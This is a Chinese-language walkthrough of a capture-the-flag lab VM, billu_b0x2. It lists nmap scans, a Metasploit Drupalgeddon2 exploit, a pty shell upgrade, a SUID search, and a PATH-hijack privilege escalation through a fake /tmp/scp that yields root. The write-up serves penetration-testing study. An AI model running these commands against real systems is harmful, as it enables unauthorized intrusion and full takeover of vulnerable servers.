最近找了几个渗透靶机来玩玩,主要目的是为了获取root权限。这次的靶机名字是billu_b0x2,下载地址
攻击机ip:192.168.6.128
靶机 ip:192.168.6.132
1.打开目标靶机,正常用nmap扫描一下目标靶机的ip,
使用命令 nmap -sP 192.168.6.0/24
可以找到目标靶机的ip地址为192.168.6.132
2.寻找靶机开放端口
使用命令 nmap -p- -A -T4 192.168.6.132
可以看到靶机开放了80,111,8080和22端口
3.那么我就正常的访问一下http服务,也就是80端口和8080端口
同时也非常幸运,在80端口可以看到其使用了drupal模板
4.既然知道了是drupal模板,就可以使用msfconsole中的drupal模块进行渗透
打开msfconsole控制台,搜索drupal
命令为:msfconsole
msf>search drupal
5.然后找到最新的一个drupal漏洞,利用它
命令为 use exploit/unix/webapp/drupal_drupalgeddon2
然后设置rhost为靶机ip
执行命令 run
然后执行shell
6.我们可以在这边输入一个反弹shell
命令为 python -c "import pty;pty.spawn('/bin/bash')"
可以获取像linux那样的shell
7.我们的目的是为了获取root权限,所以先去找找带有root权限的文件
使用命令 find / -perm -u=s 2>/dev/null
发现了一个比较不一样的带有root权限的东西 /opt/s
8.然后测试一下 strings /opt/s
发现其可以执行scp命令 并且为root权限
9.那么可以想到可以利用它来添加scp到环境变量,并且执行提权脚本
使用命令添加提权脚本到scp下,然后添加到环境变量中去
echo -nc "/bin/bash" >/tmp/scp
10.然后赋予这个文件权限
命令 chmod +x /tmp/scp
然后导入环境变量中去
命令 export PATH=/tmp:$PATH
11.可以看到环境变量已经被导入了
然后就可以切换到opt目录下,执行文件
然后可以成功的获得到root权限了
12.至此就全部结束了,下面是一些补充的学习内容
① echo命令
echo 命令可以输出字符串(想当于php的echo吧)
然后使用 > xxx/xxx 可以指定输入到某个文件中去,这样可以执行创建文件并赋值的功能